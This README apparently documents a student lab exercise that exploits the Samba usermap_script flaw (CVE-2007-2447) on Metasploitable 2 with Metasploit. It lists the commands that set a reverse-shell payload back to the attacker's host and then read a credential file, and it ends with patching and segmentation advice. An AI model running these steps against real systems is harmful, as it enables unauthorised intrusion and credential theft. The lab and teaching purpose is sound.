来源

关联漏洞

介绍

# SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2
<table>
  <tr>
    <td><h1>RedTeam-SMB-PenTest</h1></td>
    <td>
      <p align="right">
        <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/linux/linux-original.svg" alt="linux" width="60" height="60"/> 
        <img src="https://raw.githubusercontent.com/devicons/devicon/master/icons/bash/bash-original.svg" alt="bash" width="60" height="60"/>
      </p>
    </td>
  </tr>
</table>

<h2>Description</h2>
<br/> This project documents my penetration testing engagement as part of the CMIT 386 course at UMGC. It focuses on exploiting the Samba SMB usermap_script vulnerability (CVE-2007-2447) on Metasploitable 2 using Metasploit from a Kali Linux attack VM. This proof of concept shows how a legacy vulnerability can lead to full system compromise, credential theft, and data exfiltration.

<h2>Vulnerability Overview</h2>
The vulnerability resides in the Samba service on port 445, where improper input handling in the username map script allows unauthenticated remote command execution. This provides attackers with root-level shell access if exploited.

<h2>Environment</h2>

| **Component**     | **Details**                                      |
|------------------|--------------------------------------------------|
| **Attacker VM**  | Kali Linux                                       |
| **Victim VM**    | Metasploitable 2                                 |
| **Target Port**  | 445 (Samba/SMB)                                  |
| **Exploit Used** | `exploit/multi/samba/usermap_script`  |
| **Credential Target** | `/redteam7/student3/mypass.txt`       |

<h2>Steps to follow</h2>

### <u>1. Launch Metasploit:</u>
```bash
msfconsole
```
</br> Make sure both the attacker host and victim machine are booted and running. <br/>
<img src="https://github.com/user-attachments/assets/24df295a-c6ee-4870-be98-6183771a5acc"
/>
### <u>2. Search for the exploit:</u>
```bash
search samba
```
<img src="https://github.com/user-attachments/assets/529b024c-8c36-434d-a64c-a4992fe8d31d"/>

### <u>3. Use the appropriate module:</u>
```bash
use exploit/multi/samba/usermap_script
```

### <u>4. Set required options:</u>
```bash
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
```

<img src="https://github.com/user-attachments/assets/f529b7fd-23b9-4c9a-88f8-958330048864"/>

### <u>5. Execute the exploit:</u>
```bash
exploit
```
<img src="https://github.com/user-attachments/assets/f35ec488-12bd-42c4-b514-f2080a608c63"/>

### <u>6. Post-exploitation commands:</u>
```bash
whoami
hostname
cd /redteam7/student3
cat mypass.txt
```
<img src="https://github.com/user-attachments/assets/7315c711-5795-409a-a5fe-68284239b1f3"/>

<h2>Reset Instructions</h2>
If the session hangs or breaks:

### <u>Reset Metasploit:</u>
```bash
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K             
jobs -K
# Restart Metasploit
msfconsole              
```

<img src="https://github.com/user-attachments/assets/8f902b6c-0ed5-4dff-bb67-76308f33dc44"/>

### Key Takeaways

- Legacy services like Samba 3.0.20 with `usermap_script` are highly vulnerable.  
- Exploiting this SMB vulnerability grants root shell access.  
- Critical data can be harvested with simple commands, demonstrating real-world risk.  
- This proves the necessity of patching, segmentation, and reducing service exposure.  

### Recommendations

- Patch or decommission legacy systems immediately.  
- Implement strict network segmentation and firewall rules.  
- Limit SMB exposure to internal, authenticated users only.  
- Monitor logs for suspicious activity and lateral movement.


### References
- [Metasploit Samba usermap_script](https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/)
- [CVE-2007-2447 Details](https://nvd.nist.gov/vuln/detail/CVE-2007-2447)
- [Metasploitable 2 Exploit Index](https://docs.rapid7.com/metasploit/metasploitable-2/)

文件快照

 [4.0K]  /data/pocs/ceb48a9c7a8625766a9b92a51c0b2a2d8571f10e
└── [3.9K]  README.md

0 directories, 1 file

备注